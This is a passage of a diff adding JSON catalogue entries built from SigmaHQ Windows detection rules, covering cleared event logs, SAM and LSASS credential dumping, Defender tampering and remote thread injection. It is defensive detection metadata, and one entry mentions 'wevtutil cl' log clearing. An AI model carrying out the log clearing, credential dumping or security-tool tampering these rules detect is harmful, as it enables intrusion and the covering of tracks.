"win_system_susp_dhcp_config.yml", + "author": "Dimitrios Slamaris", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "value": "DHCP Server Error Failed Loading the CallOut DLL", + "meta": { + "refs": [ + 
"https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/05/15", + "filename": "win_system_susp_dhcp_config_failed.yml", + "author": "Dimitrios Slamaris, @atc_project (fix)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", + "value": "System Eventlog Cleared", + "meta": { + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2022/05/17", + "filename": "win_system_susp_eventlog_cleared.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "value": "ProcessHacker Privilege Elevation", + "meta": { + 
"refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/05/27", + "filename": "win_system_susp_proceshacker.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "value": "RTCore Suspicious Service Installation", + "meta": { + "refs": [ + "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/30", + "filename": "win_system_susp_rtcore64_service_install.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", + "value": "SAM Dump to AppData", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2018/01/27", + "filename": "win_system_susp_sam_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious service installation commands", + "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "value": "Suspicious Service Installation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service installation in suspicious folder appdata", + "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "value": "Service Installation in Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation_folder.yml", + "author": "pH-T", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service installation with suspicious folder patterns", + "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "value": "Service Installation with Suspicious Folder Pattern", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + 
"creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation_folder_pattern.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious service installation scripts", + "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "value": "Suspicious Service Installation Script", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation_script.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Windows Update get some error Check if need a 0-days KB", + "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", + "value": "Windows Update Error", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + ], + "tags": [ + "attack.impact", + "attack.resource_development", + "attack.t1584" + ], + "creation_date": "2021/12/04", + "filename": "win_system_susp_system_update_error.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. 
Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "uuid": "52a85084-6989-40c3-8f32-091e12e17692", + "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "meta": { + "refs": [ + "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/16", + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", + "author": "Cybex", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "value": "Service Installed By Unusual Client - System", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/09/15", + "filename": "win_system_system_service_installation_by_unusal_client.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "system", + "logsource.product": "windows" + } + }, + { + "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", + "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", + "value": "Tap Driver Installation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2019/10/24", + "filename": "win_system_tap_driver_installation.yml", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects volume shadow copy mount via windows event log", + "uuid": "f512acbf-e662-4903-843e-97ce4652b740", + "value": "Volume Shadow Copy Mount", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2020/10/20", + "filename": "win_system_volume_shadow_copy_mount.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "low", + "falsepositive": [ + "Legitimate use of volume shadow copy mounts (backups maybe)." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", + "value": "Vulnerable Netlogon Secure Channel Connection Allowed", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2020_1472.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2020/09/15", + "filename": "win_system_vul_cve_2020_1472.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "uuid": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "value": "Exploit SamAccountName Spoofing with Kerberos", + "meta": { + "refs": [ + "https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2021/12/15", + "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule 
detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", + "uuid": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "value": "Rare Scheduled Task Creations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_rare_schtask_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.s0111", + "attack.t1053.005" + ], + "creation_date": "2017/03/17", + "filename": "win_rare_schtask_creation.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Software installation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "uuid": "424273ea-7cf8-43a6-b712-375f925e481f", + "value": "Suspicious Scheduled Tasks Locations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_task_scheduler_susp_task_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_task_scheduler_susp_task_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", + "value": "Ngrok Usage with Remote Desktop Service", + "meta": { + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://ngrok.com/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "creation_date": "2022/04/29", + "filename": "win_terminalservices_rdp_ngrok.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Access to LSASS Process", + "uuid": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "value": "LSASS Access Detected via Attack Surface Reduction", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_alert_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2018/08/26", + "filename": "win_defender_alert_lsass_access.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects triggering of AMSI by Windows Defender.", + "uuid": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "value": "Windows Defender AMSI Trigger Detected", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_amsi_trigger.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/09/14", + "filename": "win_defender_amsi_trigger.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects disabling Windows Defender threat protection", + "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "value": "Windows Defender Threat Detection Disabled", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/07/28", + "filename": "win_defender_disabled.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", + "level": "low", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "uuid": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", + "value": "Windows Defender Exclusions Added", + "meta": { + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/06", + "filename": "win_defender_exclusions.yml", + "author": "Christian Burkard", + "level": "medium", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "uuid": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "value": "Windows Defender Exploit Guard Tamper", + "meta": { + "refs": [ + 
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_exploit_guard_tamper.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/08/05", + "filename": "win_defender_exploit_guard_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", + "uuid": "2afe6582-e149-11ea-87d0-0242ac130003", + "value": "Windows Defender Malware Detection History Deletion", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001" + ], + "creation_date": "2020/08/13", + "filename": "win_defender_history_delete.yml", + "author": "Cian Heasley", + "level": "high", + "falsepositive": [ + "Deletion of Defender malware detections history for legitimate reasons" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "uuid": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "value": "PSExec and WMI Process Creations Block", + "meta": { + "refs": [ + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands", + "https://twitter.com/duff22b/status/1280166329660497920", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_psexec_wmi_asr.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" + ], + "creation_date": "2020/07/14", + "filename": "win_defender_psexec_wmi_asr.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection", + "uuid": "49e5bc24-8b86-49f1-b743-535f332c2856", + "value": "Microsoft Defender Tamper Protection Trigger", + "meta": { + "refs": [ + "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/07/05", + "filename": "win_defender_tamper_protection_trigger.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Administrator actions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects all actions taken by Windows Defender malware detection engines", + "uuid": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "value": "Windows Defender Threat Detected", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_threat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/07/28", + "filename": "win_defender_threat.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", + "value": "WMI Persistence", + "meta": { + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ], + "creation_date": "2017/08/22", + "filename": "win_wmi_persistence.yml", + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "value": "Bumblebee Remote Thread Creation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ], + "creation_date": "2022/09/27", + "filename": "create_remote_thread_win_bumblebee.yml", + "author": "Nasreddine Bencherchali", + 
"level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "value": "CACTUSTORCH Remote Thread Creation", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" + ], + "creation_date": "2019/02/01", + "filename": "create_remote_thread_win_cactustorch.yml", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "value": "CobaltStrike Process Injection", + "meta": { + "refs": [ + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2018/11/30", + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": 
"create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "value": "CreateRemoteThread API and LoadLibrary", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2019/08/11", + "filename": "create_remote_thread_win_loadlibrary.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "uuid": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "value": "KeePass Password Dumping", + "meta": { + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", + "https://github.com/denandz/KeeFarce", + "https://github.com/GhostPack/KeeThief", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.005" + ], + "creation_date": "2022/04/22", + "filename": "create_remote_thread_win_password_dumper_keepass.yml", + "author": "Timon Hackenjos", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n", + "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "value": "Password Dumper Remote Thread in LSASS", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" + ], + "creation_date": "2017/02/19", + "filename": "create_remote_thread_win_password_dumper_lsass.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Antivirus products" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "value": "Accessing WinAPI in PowerShell. Code Injection", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/06", + "filename": "create_remote_thread_win_powershell_code_injection.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell remote thread creation in Rundll32.exe", + "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "value": "PowerShell Rundll32 Remote Thread Creation", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" + ], + "creation_date": "2018/06/25", + "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "uuid": "66d31e5f-52d6-40a4-9615-002d3789a119", + "value": "Suspicious Remote Thread Source", + "meta": { + "refs": [ + "Personal research, statistical analysis", + "https://lolbas-project.github.io", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2019/10/27", + "filename": "create_remote_thread_win_susp_remote_thread_source.yml", + "author": "Perez Diego (@darkquassar), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "create_remote_thread", + "logsource.product": "windows" + } + }, + { + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or 
